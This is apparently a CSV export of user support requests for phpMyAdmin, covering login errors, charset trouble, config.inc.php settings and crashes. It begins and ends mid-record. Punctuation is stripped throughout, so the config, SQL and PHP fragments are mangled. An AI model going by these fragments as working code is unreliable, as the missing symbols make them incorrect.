OS 2.6.18 53.1.6.el5.028stab053.6 1 SMP Mon Feb 11 20 14 31 MSK 2008 i686 Intel R) Xeon R) CPU L5320 1.86GHz GenuineIntel GNU Linux Apache 2.2.9 php 5.2.6 phpinfo ) works fine, other php apps work fine) mysql Ver 14.12 Distrib 5.0.60 but this is not relevant, yet) Original URL https sourceforge.net p phpmyadmin support requests 1093 https sourceforge.net p phpmyadmin support requests 1093 Original author danorton","bug"
"24444","2918","default login and password unknown.
I installed phpadmin in cookie authentication mode.
When I got the the login page, I was asked for the username and password, which I hadn t set up, so I didn t know what to put there and couldn t go any further... can you help?
Original URL https sourceforge.net p phpmyadmin support requests 1094 https sourceforge.net p phpmyadmin support requests 1094 Original author kyhotenow","bug"
"24444","2919","Can t get past login screen..
I upgraded to version 3.1.1 and I cannot get past the login screen.
I need help badly as my PMA has been down for three weeks now and I cannot get it back up and I am lost without it.
PLEASE HELP!
Michael Original URL https sourceforge.net p phpmyadmin support requests 1095 https sourceforge.net p phpmyadmin support requests 1095 Original author osloc Found in version Latest Git","bug"
"24444","2920","segmentation fault on export.
We are experiencing segmentation faults during export of data.
This results in either partial data to be displayed on screen or white screens when using the option to save to file.
We where using php 5.1.6 and phpMyAdmin 2.11.9.4 on Linux After upgrading the php 5.2.6 and phpMyAdmin 3.1.2 the problem still occurred.
I finally tracked this down to a problem with the mysql unbuffered query ) function.
When changing this function to a normal mysql query ) function in mysql.dbi.lib.php the problem disappeared.
I know this is not really a phpMyAdmin problem, is it not possible to add a setting in the config to switch the use of mysql unbuffered query ) on and off so other people experiencing this problem can at least still make use of phpMyAdmin?
Marcel Original URL https sourceforge.net p phpmyadmin support requests 1097 https sourceforge.net p phpmyadmin support requests 1097 Original author pluk77","bug"
"24444","2921","How can I show the real contentof a DB field in a HTML table.
I am developing a small web based application with php and mysql, to make tests, and return a statistics of results, So it is in Spanish so I have many accents and xc3xb1 s, then I need to deploy the content of my fields exactly like the value is, like phpMyAdmin shows in their tables.
So my great thanks for help.
Original URL https sourceforge.net p phpmyadmin support requests 1099 Original author ing jgarcia","bug"
"24444","2922","how do I make my form live online?.
I have built my form and it enters the information into the database accuratly All the code is working from my desktop in the htdoc folder.
I can hit the link to my form and no page appears it has the The page cannot be displayed.
window.
This is where I have the link goin to online.
It is the form page it worked on my computer but not online.
http localhost sas eirteam.php How do I make my form live on the web for all users to use?
I do not have to host on my own site correct?
Any help would be great.
I am very new to this stuff and it will be the first from I use online.
Original URL https sourceforge.net p phpmyadmin support requests 1100 Original author cornbuckle","bug"
"24444","2923","Change in Navigation Behaviour.
I have noticed, in the past year, a change in navigation behaviour; I am using 3.1.3.2. b sbrowse.png used to point to Browse , which was very helpful; however, it now points to Structure , making it more difficult without good reason, as far as I can see to browse a particular table.
What was the rationale for this change, and is there anything that can be done to reverse it?
Original URL https sourceforge.net p phpmyadmin support requests 1101 Original author x14753","bug"
"24444","2924","IE7 Only Operation Aborted when browsing.
See http support.microsoft.com default.aspx kb 927917 Periodically when browsing a table or viewing the results of a query, Internet Explorer 7 will fail with an operation aborted error.
I m not able to find a pattern that can cause this issue, as repeating the same query on the same data will often work without an error.
The error is fairly rare and I generally see it about 1 in 100 attempts.
Web Server Microsoft IIS 7.0 PHP 5.2.6 MySQL 5.1.34 community log Seen in phpMyAdmin 3.1.5 and 3.1.1 Original URL https sourceforge.net p phpmyadmin support requests 1102 Original author thedevo","bug"
"24444","2925","Timestamp editor problem.
I have this bug with v3.1.3 too.
CREATE TABLE IF NOT EXISTS `tbl` `id` int 11) unsigned NOT NULL auto increment, `createdate` timestamp NULL default NULL COMMENT mydate , PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO INCREMENT=29 ; INSERT INTO `tbl` `id`, `createdate`) VALUES 27, 2009 06 16 15 33 12 ); I am click to edit button for row 27.
I have 2009 06 16 15 33 12 in the value column and function NOW in the selectbox.
I am do not editet fields and selectbox.
But I have new value of `createdate` field saved in the row 27 after OK click on the editor page.
I see result SQL UPDATE `test`.`tbl` SET `createdate` = NOW ) WHERE `tbl`.`id` =27 LIMIT 1 ; Original URL https sourceforge.net p phpmyadmin support requests 1103 Original author lblss","bug"
"24444","2926","Error 1100 Database not fully read.. Preamble I thought I sent this message already, and did not see it on the message list in the forum.
Sorry if anyone has received this message twice.
Hello.
I am a newbie at the whole database thing, and I have gotten over some hurdles at the start, and found after some poking around, that my web host uses the collation latin1 swedish ci , and for whatever reason, this seems to be okay with my English only website under those settings on my blog.
It is unknown if Wordpress changes those settings, but I seem to have few problems.
I made a backup of this database, and decided to read it under PHPMyAdmin, which is running locally.
After a false start or two, I declare a database, then I read in my bzip2 file 1.7 megs, expands to about 12 megs), which was generated by a mysqldump command.
Something like mysqldump add drop table h dbs.webhost.com u user p user | bzip2 c gt; user.bak.sql.bz2 I get the error SQL query SELECT `comment` FROM `phpmyadmin`.`pma column info` WHERE db name = user AND table name = AND column name = db comment) MySQL said 1100 Table pma column info was not locked with LOCK TABLES This error persists regardless of the charset I choose, even binary.
All that is read are two tables out of 50 or more.
Any suggestions as to how to get this beast read by PHPMyAdmin?
Thanks for everyone s help so far.
I am using PHPMyAdmin version 3.3.8.1.
Phrank Original URL https sourceforge.net p phpmyadmin support requests 1161 Original author psinatra","bug"
"24444","2927","Problem with installation.
I have gone step by step with your installation process for my mac x. I am receiving the following errors when trying to login.
Any suggestions would be greatly appreciated.
Notice Undefined variable k in Library WebServer Documents phpMyAdmin setup lib ConfigFile.class.php on line 289 0 PMA sendHeaderLocation http localhost phpmyadmin index.php?token=12aec49209f6ac2491cf57ca9d93eda5) called at [ Library WebServer Documents phpMyAdmin libraries auth cookie.auth.lib.php 628] 1 PMA auth set user ) called at [ Library WebServer Documents phpMyAdmin libraries common.inc.php 829] 2 require once Library WebServer Documents phpMyAdmin libraries common.inc.php) called at [ Library WebServer Documents phpMyAdmin index.php 35] Original URL https sourceforge.net p phpmyadmin support requests 1105 Original author scottypwatkins","bug"
"24444","2928","Invalid Server Index Error.
After installing and setting up the config.inc.php file on my machine, a visit to http localhost username phpmyadmin returns only a partial Admin screen.
The lower half, where new databases are created is missing.
Instead, the error Invalid server index .
Any ideas on a fix?
I m guessing my config file is incorrect?
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 1106 Original author bretgh","bug"
"24444","2929","when i click on phpmyadmin, the browser crashes.
I ve tried MAMP and XAMPP on Mac OSX 10.4.11 and when i click on phpmyadmin in the control panel it just crashes firefox and safari.
I has previously worked fine, but I think something must have changed...either privileges or network settings, but i m not sure.
I ve tried installing and reinstalling, and have only one application MAMP or XAMPP) on my system at a time.
Apache 2.2.11 PHP5.2.9 Perl 5.10.0 Firefox 3.0.10 Original URL https sourceforge.net p phpmyadmin support requests 1107 Original author jbscaf","bug"
"24444","2930","Error.
Error MySQL said 1045 Access denied for user root localhost using password NO) Original URL https sourceforge.net p phpmyadmin support requests 1109 Original author fsantil","bug"
"24444","2931","Session problem in search field.
Hello, i use phpMyAdmin from package phpMyAdmin 2.11.9.5 all languages.tar.bz2, PHP version 5.2.0 8 etch15, Apache 2.0 on Linux.
I tried to use MySQL version 4.x or 5.x, the behavior is there the same.
To the contrary, on PHP 4.x it seems to be ok.
The error appers so i successfully logged into the phpMyAdmin as root, i browse some databases and tables, so i want to search some data from one collumn.
I write into the input field some data im looking for.
When i submit this, phpMyAdmin will logout me and insted of username root are there in username input pre filled some trash like \{xefxbfxbdx7f gt;xefxbfxbdAxefxbfxbd9 and so on.
Original URL https sourceforge.net p phpmyadmin support requests 1110 Original author votruba","bug"
"24444","2932","Reset of root password breaks phpMyAdmin login.
BACKGROUND Running Mac OS X Server 10.5.8.
Using default install of MySQL service v.5.0.45).
Using entropy s PHP 5.2.5 for best compatibility for custom publishing server application we run.
Installed phpMyAdmin 2.11.9.5.
No problems running MySQL server, Apache server with PHP.
No problems connecting and managing with Terminal, MySQL Administrator or phpMyAdmin.
ISSUE Default MySQL install creates root user account but with no password.
Moving from development testing to production server environment, so need to secure MySQL install.
All we want to do is set a password for MySQL s root user.
Have used GUI tools.
Have used Terminal commands, followed MySQL reference manual.
No problem changing password and connecting with Terminal or with MySQL Administrator.
BUT cannot connect through phpMyAdmin after setting a root password.
Workaround is to reset root password back to none.
Then phpMyAdmin works fine.
Using auth type = cookie in our config.inc.php.
Do not want to use non secure config authentication but we did try it with no success.
Original URL https sourceforge.net p phpmyadmin support requests 1111 Original author nowmag Found in version 2.11.9.5","bug"
"24444","2933","Acceso al PHPMyAdmin.
buenas, Actualmente utilizo phpmyadmin bajo cpanel, la cosa es que cuando intento accesar al phpmyadmin me da el siguiente errot El nombre de usuario o la contrasexc3xb1a estxc3xa1 equivocado.
El acceso fue denegado.
Y no tengo ni la mas minima idea de como puedo arreglarlo y si me urge poder accesar la aplicacion.
Gracias.
Original URL https sourceforge.net p phpmyadmin support requests 1112 Original author jonjimar","bug"
"24444","2934","table description.
unable to update table descriptive text within gui presented as comment within interface pardon if as per design although feature request if as not Original URL https sourceforge.net p phpmyadmin support requests 1113 Original author asrekdal","bug"
"24444","2935","Additional features for linked tables unable to activate.
I edited file PMA ROOT config.inc.php by adding cfg[ Servers ][ i][ pmadb ] = phpmyadmin ; cfg[ Servers ][ i][ relation ] = pma relation ; cfg[ Servers ][ i][ table info ] = pma table info ; cfg[ Servers ][ i][ table coords ] = pma table coords ; cfg[ Servers ][ i][ pdf pages ] = pma pdf pages ; cfg[ Servers ][ i][ column info ] = pma column info ; cfg[ Servers ][ i][ history ] = pma history ; cfg[ Servers ][ i][ designer coords ] = pma designer coords ; After that I created DB with tables using PMA ROOT scripts create tables.sql and PMA ROOT scripts upgrade tables mysql 4 1 2 .sql When I call PMA ROOT chk rel.php, I see that http img690.imageshack.us img690 2615 pma.png Original URL https sourceforge.net p phpmyadmin support requests 1114 Original author aaa1234554321","bug"
"24444","2936","German Umlaute not displaying correctly table query results.
steps to reproduce database table list anzeigen show output for Stxc3xbcckanzahl Stxc3x83xc2xbcckanzahl not solved by browser encodings, config below and variations thereof 2 delta etc phpmyadmin config.inc.php lxc3xb6st es nicht lt;pre gt; cfg[ Lang ] = de utf 8 ; cfg[ DefaultCharset ] = iso 8859 1 ; cfg[ AllowAnywhereRecoding ] = true; default language = de utf 8 ; cfgLang = de utf 8 ; cfg[ DefaultLang ] = de utf 8 ; mysql gt; show variables like character set ; | Variable name | Value | | character set client | latin1 | | character set connection | latin1 | | character set database | latin1 | | character set filesystem | binary | | character set results | latin1 | | character set server | latin1 | | character set system | utf8 | | character sets dir | usr share mysql charsets | 8 rows in set 0.00 sec) Original URL https sourceforge.net p phpmyadmin support requests 1115 Original author sea800","bug"
"24444","2937","Left Browserframe is reduced in Chrome.
In Chrome Browsers Google Browser) the left Frame with the databases or tables of a database is reduced step by step until it s nearly invisible.
Responsibility for this Bug wasn t verified but the symptom is called by stepwise reduced values in the cookie pma navi width .
After deleting this cookie the framewidth gets a usable format again.
Original URL https sourceforge.net p phpmyadmin support requests 1116 Original author davidbruchmann","bug"
"24444","2938","Wrong Config Parameter nopassword .
Config Generator generates a wrong cfg Parameter named nopassword .
It must set to AllowNoPassword to make it work.
Original URL https sourceforge.net p phpmyadmin support requests 1117 Original author djbrainnrg","bug"
"24444","2939","Does not work with PHP 5.3.1.
When I upgraded from PHP 5.3.0 to 5.3.1 MyAdmin stopped working.
I could log in but then was presented with a blank screen in MyAdmin.
I switched back to PHP 5.3.0 and MyAdmin is functioning correctly.
I am running Windows Vista, Apache 2.2.14 local, MySQL 5.1.41 Den Original URL https sourceforge.net p phpmyadmin support requests 1118 Original author denspiess","bug"
"24444","2940","export not working.
Hi I have phpmyadmin 2.11.6 installed on fedora 7 when I click on export of any database it display me blank page.
Dont understand why it is.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 1119 Original author junaidali3","bug"
"24444","2941","on trying to update a table cell.
phpMyAdmin 2.9.1.1 Debian 11 MySQL client version 5.0.32 When trying to alter the value in a table I get this probably means I need to upgrade via apt get) Warning Invalid argument supplied for foreach ) in usr share phpmyadmin tbl replace.php on line 155 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 155) in usr share phpmyadmin libraries common.lib.php on line 1160 Original URL https sourceforge.net p phpmyadmin support requests 1120 Original author berging","bug"
"24444","2942","Config Variables.
I m trying to get the additional features to operate and I followed the instructions exactly, but PMA still says that my variables aren t set.
Se my config.inc.php file below.
And yes, I did run the create tables.sql).
lt;pre gt; cfg[ Servers ][ i][ verbose ] = localhost ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ port ] = ; cfg[ Servers ][ i][ socket ] = ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ extension ] = mysqli ; cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = root ; cfg[ Servers ][ i][ password ] = ; cfg[ Servers ][ i][ AllowNoPassword ] = false; cfg[ Servers ][ i][ pmadb ] = phpmyadmin ; cfg[ Servers ][ i][ bookmarktable ] = pma bookmark ; cfg[ Servers ][ i][ relation ] = pma relation ; cfg[ Servers ][ i][ table info ] = pma table info ; cfg[ Servers ][ i][ table coords ] = pma table coords ; cfg[ Servers ][ i][ pdf pages ] = pma pdf pages ; cfg[ Servers ][ i][ column info ] = pma column info ; cfg[ Servers ][ i][ history ] = pma history ; cfg[ Servers ][ i][ designer coords ] = pma designer coords ; lt; pre gt; Here are my erros lt;pre gt; cfg[ Servers ][ i][ pmadb ] ... OK cfg[ Servers ][ i][ relation ] ... not OK [ Documentation ] General relation features Disabled cfg[ Servers ][ i][ table info ] ... not OK [ Documentation ] Display Features Disabled cfg[ Servers ][ i][ table coords ] ... not OK [ Documentation ] cfg[ Servers ][ i][ pdf pages ] ... not OK [ Documentation ] Creation of PDFs Disabled cfg[ Servers ][ i][ column info ] ... not OK [ Documentation ] Displaying Column Comments Disabled Bookmarked SQL query Disabled Browser transformation Disabled cfg[ Servers ][ i][ history ] ... not OK [ Documentation ] SQL history Disabled cfg[ Servers ][ i][ designer coords ] ... not OK [ Documentation ] Designer Disabled lt; pre gt; Original URL https sourceforge.net p phpmyadmin support requests 1121 Original author anonymous Found in version Latest Git","bug"
"24444","2943","Cannot login to phpMyAdmin.
I am an experienced phpMyAdmin user, but have never installed it before it was always pre installed by my ISP).
I am trying to create a php mySQL development environment on my Mac Pro running MacOS 10.6.2 Snow Leopard).
I have mySQL installed correctly and it runs just fine.
Apache is configured correctly and it runs just fine.
PHP is correctly configured and it runs just fine.
The phpMyAdmin folder is sitting in the Sites folder in my user directory on my Mac.
Using the following URL localhost username phpMyAdmin ) I can access the phpMyAdmin login screen.
However, when I do so, I get errors please see attached screen shot).
I m a beginner at PHP and know almost zero UNIX, so please explain the solution s) in very basic terms and step by step.
Thanks!
When Original URL https sourceforge.net p phpmyadmin support requests 1123 Original author unpocoloco","bug"
"24444","2944","Error.
Hello, I\ m running Wamp on my local machine.
When i open phpmyadmin window, the following error message is appeared.
Fatal error Uncaught exception mysqli sql exception with message No index used in query prepared statement SHOW CHARACTER SET; in C \wamp\apps\phpmyadmin3.2.0.1\libraries\dbi\mysqli.dbi.lib.php 170 Stack trace 0 C \wamp\apps\phpmyadmin3.2.0.1\libraries\dbi\mysqli.dbi.lib.php 170) mysqli query Object mysqli), SHOW CHARACTER ... , 0) 1 C \wamp\apps\phpmyadmin3.2.0.1\libraries\database interface.lib.php 84) PMA DBI try query SHOW CHARACTER ... , NULL, 0) 2 C \wamp\apps\phpmyadmin3.2.0.1\libraries\mysql charsets.lib.php 17) PMA DBI query SHOW CHARACTER ... ) 3 C \wamp\apps\phpmyadmin3.2.0.1\libraries\sqlparser.lib.php 50) require once C \wamp\apps\ph... ) 4 C \wamp\apps\phpmyadmin3.2.0.1\libraries\common.inc.php 928) require once C \wamp\apps\ph... ) 5 C \wamp\apps\phpmyadmin3.2.0.1\index.php 35) require once C \wamp\apps\ph... ) 6 \{main\} thrown in C \wamp\apps\phpmyadmin3.2.0.1\libraries\dbi\mysqli.dbi.lib.php on line 170 Help me on this issue as soon as possible.
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 1124 Original author heer4582","bug"
"24444","2945","cURL support.
I am having trouble with Wordpress site plugins.
I keep receiving a Access Denied error and the error is pointing to a cURL problem.
I don t know how to check for cURL support and even if it is active.
I am a complete begineer who is flying blind so any help would be appreciated.
Original URL https sourceforge.net p phpmyadmin support requests 1187 Original author studentopia12","bug"
"24444","2946","Insert xc2xa3 sign using inline edit.
Hello, How can I enter xc2xa3 sign using inline edit and save, erlier its sign, and i tried to change it using inline edit.
I just trype it, but it gives error in php script.
my db is in utf8 encoding, Thank You.
Original URL https sourceforge.net p phpmyadmin support requests 1188 Original author aonetwork Found in version 3.4.7","bug"
"24444","2947","PMA Index undefined method [FATAL].
I am getting an error by most of the tables, the following error is shown Fatal error Call to undefined method PMA Index ) in var www html phpMyAdmin 3.1.3 all languages libraries display tbl.lib.php on line 480 I don t know how the error came up, phpmyadmin worked fine for many months except today..
I can not edit of select tables in phpmyadmin..
Original URL https sourceforge.net p phpmyadmin support requests 1125 Original author phpdylan","bug"
"24444","2948","Login Page.
I was Installed the Phpmyadmin 2.10 version done all the authatication setting for cookies but still it is not showing the login screen.
I also want to tell you that my root account has no password.
Original URL https sourceforge.net p phpmyadmin support requests 1126 Original author ashishdange1973","bug"
"24444","2949","having problem with the following issues.
I am using IIS 7.5 and recently installed php and mysql support for IIS.
Today I used phpmyadmin to access mysql and other stff Bt when I ran it I found a few errors .. they r as following Server localhost cfg[ Servers ][ i][ pmadb ] ... not OK [ Documentation ] cfg[ Servers ][ i][ relation ] ... not OK [ Documentation ] General relation features Disabled cfg[ Servers ][ i][ table info ] ... not OK [ Documentation ] Display Features Disabled cfg[ Servers ][ i][ table coords ] ... not OK [ Documentation ] cfg[ Servers ][ i][ pdf pages ] ... not OK [ Documentation ] Creation of PDFs Disabled cfg[ Servers ][ i][ column info ] ... not OK [ Documentation ] Displaying Column Comments Disabled Browser transformation Disabled cfg[ Servers ][ i][ bookmarktable ] ... not OK [ Documentation ] Bookmarked SQL query Disabled cfg[ Servers ][ i][ history ] ... not OK [ Documentation ] SQL history Disabled cfg[ Servers ][ i][ designer coords ] ... not OK [ Documentation ] Designer Disabled And even getting an error xe2x80x9cCannot load mcrypt extension.
Please check your PHP configuration.xe2x80x9d Plz tell me how can I correct all the configration.
Thanks I am new to it so I donxe2x80x99t knoe.
Original URL https sourceforge.net p phpmyadmin support requests 1127 Original author sm4nee Found in version Latest Git","bug"
"24444","2950","Apache restarted when try to display table.
Simple request sql.php?db=hut table=gnom lead to restart web server and blank result page php 5.3.1 mysql 5.1.32 apache 2.2.14 I tracked where crash occurs, display tbl.lib.php line 176 if isset unlim num rows) unlim num rows lt; 2 !PMA Table isView db, table)) \{ when I change this to cond = !PMA Table isView db, table); if isset unlim num rows) unlim num rows lt; 2 cond) \{ then all working fine Original URL https sourceforge.net p phpmyadmin support requests 1129 Original author dylfin Found in version Latest Git snapshot","bug"
"24444","2951","No privilege or database.
I login through mydatabse.registeredsite.com every friday and back up SQL.
When I logged in today there isn t a database and I dont have any permissions to create one so I cant even restore last weeks.
I am the only person that has the login information.
What happened and what can I do.
the login page says its version phpMyAdmin 2.5.3.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 1130 Original author whathappened","bug"
"24444","2952","Error 101 when SQL return is a one row.
I am experiencing a very strange problem with phpmyadmin ver 3.2.0.
I have Apache 2.2.11 installed in fact WAMP server).
Whenever I run a query in phpmyadmin, whose result is one row only I get a The webpage at http localhost phpmyadmin import.php might be temporarily down or it may have moved permanently to a new web address.
.
The details are Error 101 net ERR CONNECTION RESET) Unknown error.
If I run absolutely the same query, but the result is 2 or more rows then it runs normally.
Please, anyone..
Thank you Original URL https sourceforge.net p phpmyadmin support requests 1132 Original author anonymous","bug"
"24444","2953","pma tracking table doesn t update.
I m trying to monitor changes every type) on some table of my DB, but it seems that the tracking system can t recognize update on the changed and monitored tables.
pma tracking table always shows records with creation and last update equal.
Original URL https sourceforge.net p phpmyadmin support requests 1198 Original author davidepaltri","bug"
"24444","2954","Not able to edit or delete a single record.
Hi, I am using phpmyadmin 2.11.7 and having the following issue 1\.
not able to edit or delete a single record through the browse window, while the bulk edit and delete are working absolutely fine.
2\.
not able to add an index on a selective column of a table In all the cases, the page is experiencing a timeout.
Can you please guide me about where I should look into to resolve this?
Thanks in advance.
Original URL https sourceforge.net p phpmyadmin support requests 1133 Original author anupam saha","bug"
"24444","2955","no wrning givn when naming a db table using reserved word.
I named my database database and my table table and php gave an error.
I recreated the database and table with a different name and got no problems.
WHY DID I NOT GET AN ERROR OF THE LIKES OF FUCK YOU ASSHOLE, YOU CAN T USE RESERVED NAMES FOR YOUR DATABASE TABLE NAMES WHYYYYYYYYYYYYYYYYYYY?????
Original URL https sourceforge.net p phpmyadmin support requests 1134 Original author anonymous","bug"
"24444","2956","Suhosin patch issue with phpmyadmin.
I have php5 phpmyadmin installed on debian server.
suhosin patch is also installed.
Now i am not able to table records using phpmyadmin.
I have made changes in suhosin.ini as suhosin.simulation = on suhosin.post.max array index length = 6000 suhosin.post.max name length = 64 suhosin.post.max totalname length = 256 suhosin.post.max value length = 500000 suhosin.post.max vars = 5000 suhosin.get.max value length = 500000 suhosin.get.max vars = 5000 But still same issue.
Can anybody help me Original URL https sourceforge.net p phpmyadmin support requests 1135 Original author sunidhi","bug"
"24444","2957","Synrax error in SQL request.
Hi, I make a personal SQL request with a alias name for table and I request after a request a modify on a record of my personal SQL request.
Then I have error 1054 Unknown column a.uid in where clause because SQL syntax is with an error.
For example SELECT column name FROM table name AS alias name WHERE 1; gt; result okay.
I select a modify action on a record and I ca see requxc3xaate SQL SELECT FROM `database name`.`table name` WHERE `alias name`.`id` =1; MySQL a rxc3xa9pondu 1054 Unknown column `alias name`.`id` in where clause Original URL https sourceforge.net p phpmyadmin support requests 1136 Original author tibre44","bug"
"24444","2958","left frame extremly slow after mysql 5.0.x > 5.1.45.
Hello.
Recently Ixe2x80x99ve switched from mysql 5.0.x to 5.1.45 Since the switch left frame of phpmyadmin loads many minutes few hundret of databases).
Before change it was immediate.
Clicking on databases in right frame is fast.
What sould I do it make left frame working again?
Ixe2x80x99ve recompiled php with new mysql lib but no changes.
Original URL https sourceforge.net p phpmyadmin support requests 1137 Original author anonymous","bug"
"24444","2959","asp.net providers do not work.
I copied my website to the hosting provider s site.
My website uses MySql membership, role and profile provider, they work fine on my localhost.
However, these providers do not run on the remote server.
I also copied the my aspnet membership table and the other provider tables schemas) into my MySql database on the server, but in vain.
I get a parser error message stating that Could not load file or assembly MySql.Web, Version=6.2.3.0, Culture=neutral, PublicKeyToken=c5687fc88969c44d or one of its dependencies.
The system cannot find the file specified.
What do I need to do for the server to recognise the providers and use them?
On my local machine I could gererate the my aspnet provider schemas as an administrator, but on the remote server it is obviously not possible.)
Any help is highly appreciated.
Thanks, Zolly Original URL https sourceforge.net p phpmyadmin support requests 1138 Original author zolly","bug"
"24444","2960","cannot change character set to latin2.
I have been provided a phpMyAdmin website to configure my MySql database.
The character set of the host is set to utf 8, but my database uses latin2.
I set the collations of my tables to latin2, but I am not allowed to change the character set of the host from utf8 to latin 2, which would be required for my characters to appear correctly.
on my local machine I could easily change the character set to latin2 using the MySql Instance Configure Wizard, but obviously I cannot do it on the remote host machine.)
How can I change the character set to latin2 for my entire database, or how can I save and display latin2 characters in my database?
Any help is highly appreciated, Zolly Original URL https sourceforge.net p phpmyadmin support requests 1139 Original author zolly","bug"
"24444","2961","Switching between 2 states of database.
Hello.
Several days ago my main database started switching between 2 different states.
Switching occures in random moments of time.
Changes in one state of db dont happens in other, so now I have actual state of db and nonactual.
How can I fix it?
Server version 5.1.41 3ubuntu12.7 Apache version 2.2.14 Ubuntu) phpMyAdmin version 3.3.2deb1 Original URL https sourceforge.net p phpmyadmin support requests 1214 Original author arifurinmoto Found in version 3.4.7","bug"
"24444","2962","Cannot repair.objectcache table.
Please can you help me, i ve looked on several dozen websites for help but i cannot for the life of me find a solution to what seems like a very simple problem.
My site is showing the MySQL returned error 126 Incorrect key file for table .
xxxxxx page.MYI ; try to repair it mysql5.xxxxxxx.com) .
which is simple enough to understand.
I ve logged into phpMyAdmin, tried to repair it but it says it s read only.
I ve literally spent hours looking for a way to make it writeable but have come up with nothing.
I don t want to start trying out random things it says to do on websites as i don t want to corrupt the database beyond repair.
Thankyou in advance.
Original URL https sourceforge.net p phpmyadmin support requests 1140 Original author hyposphere Found in version 2.5.0 rc2","bug"
"24444","2963","phpMyAdmin does not support mysql providers?.
Hi Friends, My website is configured to use the mysql asp.net providers membership, profile, role) in the MySql database.
I tested it on my local machine as localhost and it does work.
However, after having copied my site to the remote server it does not recognise the mysql providers.
I assume that the server is not configured properly or I have to make some adjustment.
On the phpMyAdmin page I see no option clue as to how to configue the mysql providers in order to use them.
Any help is grately appreciated, Zolly Original URL https sourceforge.net p phpmyadmin support requests 1141 Original author zolly","enhancement"
"24444","2964","Phpmyadmin Error.
I have this problem where I keep getting this error, it starts about 2 days ago, and I have tried everything and I am still unable to get rid of this error.
I am using easyphp as the server.
Is there someone who can fix this problem?
P.S and yes I already uninstalled and reinstalled easyphp.
Original URL https sourceforge.net p phpmyadmin support requests 1217 Original author windmillspecial Found in version 3.4.7 Attachment http sourceforge.net p phpmyadmin support requests 1217 attachment problem.png","bug"
"24444","2965","pma database not replicate.
When the replication mysql is enabled, all the phpmyadmin database aren t replicate.
No entry on binlog file.
versions phpmyadmin 3.2.3 with 2 server on mysql 5.0.32 Debian 7etch6 log with bi directionnal replication master slave slave master Stephane.
Original URL https sourceforge.net p phpmyadmin support requests 1142 Original author steph10200","bug"
"24444","2966","Error 1115 Unknown character set utf8 .
Hi, When I try to connect to a remote database, i get the error Error SQL query Edit SET CHARACTER SET utf8 ; MySQL said Documentation 1115 Unknown character set utf8 See image attached) I tried to change values in config.inc.php but i cannot solve the issue.
Is a LAMP PHP extension mysqli) in Debian.
last updates) any ideas?
Thanks, KiFo Original URL https sourceforge.net p phpmyadmin support requests 1143 Original author kifo Found in version Latest Git","bug"
"24444","2967","Removed Root User Privileges.
I created another user before that, with all privileges.
How can I access root and give all access back?
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 1145 Original author jearx","bug"
"24444","2968","Problematic full table scan.
We have a large table 6M rows, 26 fields) with a varchar 16) primary key.
Both the table and the primary key use collation utf8 general ci.
When I use PHPMyAdmin s search method to search for a primary key, it works fine MySQL uses the index as it should).
However, when I click on the pencil to edit the resulting row in the following dialog, PHPMyAdmin sends the following statement to the database SELECT FROM `db.table` WHERE CONVERT `table`.`primarykey` USING utf8) = someprimarykey ; Which causes no suprise due to the CONVERT ) call) a full table scan according to mysql slow.log) Query time 62 Lock time 0 Rows sent 1 Rows examined 6004346 Which is a problem in our environment something like 100 hits s that want to use the DB and don t like it if one of the tables is locked for a full minute...).
What causes this?
Is something wrong with my setup character sets...) or is this a bug?
Thanks!
PHPMyAdmin 2.11.8.1deb5 lenny4 MySQL 5.0.51a 24 lenny3 log Character set should be utf8 and collation utf8 general ci pretty much anywhere Original URL https sourceforge.net p phpmyadmin support requests 1146 Original author anonymous","bug"
"24444","2969","Blank page.
On one table, clicking the relations link, I receive a blank page.
I don t have this problem on other tables.
The table has 8 records, 224Kb, is an Innodb table as well as all other tables without problems), has a lot of columns maybe 100), has a primary and an unique key and 12 other indexes.
The problem is started after adding a new column with a new non unique index.
The added column is a tinyint unsigned not null.
I have discovered the problem is in libraries ob.lib.php in the function PMA outBufferPre And solved temporarly disabling the line ob start ob gzhandler ); in the function PMA outBufferPre.
I don t have understood the origin of the problem and don t have yet time to investigate further.
Original URL https sourceforge.net p phpmyadmin support requests 1148 Original author asteddy","bug"
"24444","2970","PECL APC problem with relative includes in PMA.
PHP in combination with the PECL extension APC Alternative PHP Cache) 3.1.3 dev svn head) fails to display the PMA interface after logging in log in screen itself works smoothly).
PHP Error Fatal error Class PMA Error Handler not found in F \srv\www\pma\libraries\common.inc.php on line 58 This MAY be caused by the way PMA includes files and classes PHP require once .
libraries Error Handler.class.php ; As suggested in a APC bug report this is caused by APC not handling relativley included files correctly, however it could be avoided by PMA in two ways as there seems to be no fix from APC not using require once when other eg.
require would be more appropriate using absolute includes eg.
using FILE or PHP constants) Another suggestion was using session write close ) at the end of the session.
I haven t tried it myself but including files using .
dir file.php does not seem to be a good coding style either.
Duplicate of 2833470 closed).
See APC Bugs http pecl.php.net bugs bug.php?id=16945, http pecl.php.net bugs bug.php?id=13828.
Apache 2.2.15 PHP 5.3.3, 5.3.2 PMA 3.3.4, 3.3.3 APC 3.1.3 dev Win32 XP, Vista) Original URL https sourceforge.net p phpmyadmin support requests 1149 Original author jaunknown","bug"
"24444","2971","missing parameters error a bug found.
This error is VERY annoying.
Many users reports this error but this can be due to bad config.
I have checked FAQ, mine is correct Steps to reproduce Browse table data, then sort table by a column.
When I leave the page for 10 minutes and I click the refresh button that one next Create PHP code), it produces this error.
I have to click in the tree to reload the right frame.
I guess it s the session expiration problem.
I use http auth so I m still logged in but this errors occurs.
Linux, PHP 5.3, I think this bug exists for long time Original URL https sourceforge.net p phpmyadmin support requests 1150 Original author freeman3","bug"
"24444","2972","Delete Edit of values in a View dosnxc2xb4t work.
If you create a view and display it, you have, just like in normal tables, the options to delete or edit the entries.
If you click on it, in example delete, you get an error 1288 The target table NAMEOFVIEW of the DELETE is not updatable ).
If the icons donxc2xb4t have a purpose, why display them ?
Original URL https sourceforge.net p phpmyadmin support requests 1151 Original author matze berlin","bug"
"24444","2973","query executed twice.
